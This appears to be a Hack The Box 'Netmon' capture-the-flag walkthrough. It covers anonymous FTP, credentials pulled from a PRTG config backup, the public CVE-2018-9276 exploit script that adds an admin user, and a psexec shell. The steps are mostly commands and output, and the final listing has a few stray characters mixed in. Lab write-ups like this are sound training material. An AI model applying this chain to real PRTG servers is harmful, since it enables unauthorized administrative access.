Netmon - Easy
OSCP Prep Box
Introduction@Netmon:~$
Enumeration
Nmap
# Nmap 7.92 scan initiated Thu Dec 23 15:58:37 2021 as: nmap -sC -sV -oN nmap.out 10.10.10.152
Nmap scan report for netmon.htb (10.10.10.152)
Host is up (0.35s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19 11:18PM 1024 .rnd
| 02-25-19 09:15PM <DIR> inetpub
| 07-16-16 08:18AM <DIR> PerfLogs
| 02-25-19 09:56PM <DIR> Program Files
| 02-02-19 11:28PM <DIR> Program Files (x86)
| 02-03-19 07:08AM <DIR> Users
|_02-25-19 10:49PM <DIR> Windows
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-server-header: PRTG/18.1.37.13946
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-12-23T09:37:47
|_ start_date: 2021-12-23T09:36:30
|_clock-skew: mean: 8m49s, deviation: 0s, median: 8m49s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 23 15:59:03 2021 -- 1 IP address (1 host up) scanned in 26.48 secondsFTP can login with Anonymous
┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$ ftp 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:sheinn101): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-02-19 11:18PM 1024 .rnd
02-25-19 09:15PM <DIR> inetpub
07-16-16 08:18AM <DIR> PerfLogs
02-25-19 09:56PM <DIR> Program Files
02-02-19 11:28PM <DIR> Program Files (x86)
02-03-19 07:08AM <DIR> Users
12-23-21 05:20AM <DIR> Windows
226 Transfer complete.
ftp>It seem like ftp root directory is c:\
Getting User.txt
ftp> cd users
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-25-19 10:44PM <DIR> Administrator
12-23-21 05:13AM <DIR> Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19 07:05AM <DIR> Documents
07-16-16 08:18AM <DIR> Downloads
07-16-16 08:18AM <DIR> Music
07-16-16 08:18AM <DIR> Pictures
12-23-21 05:18AM 94 tester.txt
12-23-21 04:37AM 34 user.txt
07-16-16 08:18AM <DIR> Videos
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful.
150 Opening ASCII mode data connection.
226 Transfer complete.
34 bytes received in 0.33 secs (0.0999 kB/s)
ftp> exit
221 Goodbye.
┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$ cat user.txt
f876bb779c4439a08f27e9b0404e6fb5We can easily get user flag with ftp anonymous.
Web
It PRTG Network Monitor (NETMON) page and we should try default credential which is prtgadmin:prtgadmin . But it doesn't work in here. We need to search the credential in FTP login.
After poke around, found PRTG Network Configuration File in this location \ProgramData\Paessler\PRTG Network Monitor.
ftp> cd "\ProgramData\Paessler\PRTG Network Monitor"
250 CWD command successful.
ftp> ls -al
200 PORT command successful.
150 Opening ASCII mode data connection.
12-15-21 07:23AM <DIR> Configuration Auto-Backups
12-23-21 04:36AM <DIR> Log Database
02-02-19 11:18PM <DIR> Logs (Debug)
02-02-19 11:18PM <DIR> Logs (Sensors)
02-02-19 11:18PM <DIR> Logs (System)
12-23-21 04:36AM <DIR> Logs (Web Server)
12-23-21 04:42AM <DIR> Monitoring Database
02-25-19 09:54PM 1189697 PRTG Configuration.dat
02-25-19 09:54PM 1189697 PRTG Configuration.old
07-14-18 02:13AM 1153755 PRTG Configuration.old.bak
12-23-21 05:18AM 1671248 PRTG Graph Data Cache.dat
02-25-19 10:00PM <DIR> Report PDFs
02-02-19 11:18PM <DIR> System Information Database
02-02-19 11:40PM <DIR> Ticket Database
02-02-19 11:18PM <DIR> ToDo Database
226 Transfer complete.
ftp> get "PRTG Configuration.old.bak"<dbpassword>
<!-- User: prtgadmin -->
PrTg@dmin2018
</dbpassword>Let's try with this credentials in Login Page.
But it doesn't work, if we look again password structure PrTg@dmin2018 .It end with 2018 and the configuration file is also a backup file. So we should change that year in password. I tried it with PrTg@dmin2019 and It was worked.
Geting Administrator
We can see version of that page on the left bottom and now we should try to search exploit for that.
We will use this exploitdb bash script.
If we execute this bash script, you may get error like this
┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$ ./46527.sh
-bash: ./46527.sh: /bin/bash^M: bad interpreter: No such file or directory
┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$Run the following command to fix that error.
sed -i -e 's/\r$//' 46527.sh
┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$ ./46527.sh
[+]#########################################################################[+]
[*] Authenticated PRTG network Monitor remote code execution [*]
[+]#########################################################################[+]
[*] Date: 11/03/2019 [*]
[+]#########################################################################[+]
[*] Author: https://github.com/M4LV0 lorn3m4lvo@protonmail.com [*]
[+]#########################################################################[+]
[*] Vendor Homepage: https://www.paessler.com/prtg [*]
[*] Version: 18.2.38 [*]
[*] CVE: CVE-2018-9276 [*]
[*] Reference: https://www.codewatch.org/blog/?p=453 [*]
[+]#########################################################################[+]
# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!'
[+]#########################################################################[+]
EXAMPLE USAGE: ./prtg-exploit.sh -u http://10.10.10.10 -c "_ga=GA1.4.XXXXXXX.XXXXXXXX; _gid=GA1.4.XXXXXXXXXX.XXXXXXXXXXXX; OCTOPUS1813713946=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX; _gat=1"We need to get cookie using burp to run this script.
./46527.sh -u http://10.10.10.152 -c "_ga=GA1.2.2019227520.1640252936; _gid=GA1.2.125523594.1640252936; OCTOPUS1813713946=e0RGRUJCNzI0LTBDMzYtNDk5Q04QzIzLUY3ODVEODJFQjJDNX0%3D"Now we created a new user with this credential pentest:P3nT3st! Login with psexec.py
┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$ python3 /usr/share/doc/python3-impacket/examples/psexec.py pentest:"P3nT3st!"@10.10.10.152
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.10.152.....
[*] Found writable share ADMIN$
[*] Uploading file xHANHcvF.exe
[*] Opening SVCManager on 10.10.10.152.....
[*] Creating service KSTQ on 10.10.10.152.....
[*] Starting service KSTQ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd c:\users\administrator\desktop
c:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 0EF5-E5E5
Directory of c:\Users\Administrator\Desktop
02/02/2019 11:35 PM <DIR> .
t02/02/2019 11:35 PM <DIR> ..
yp12/23/2021 04:37 AM 34 root.txte
1 File(s) 34 bytes
ro 2 Dir(s) 6,758,518,784 bytes free
ot
.c:\Users\Administrator\Desktop>type root.txt
52a75d9617892bb0d16e610dbf2e8787Resources
Last updated
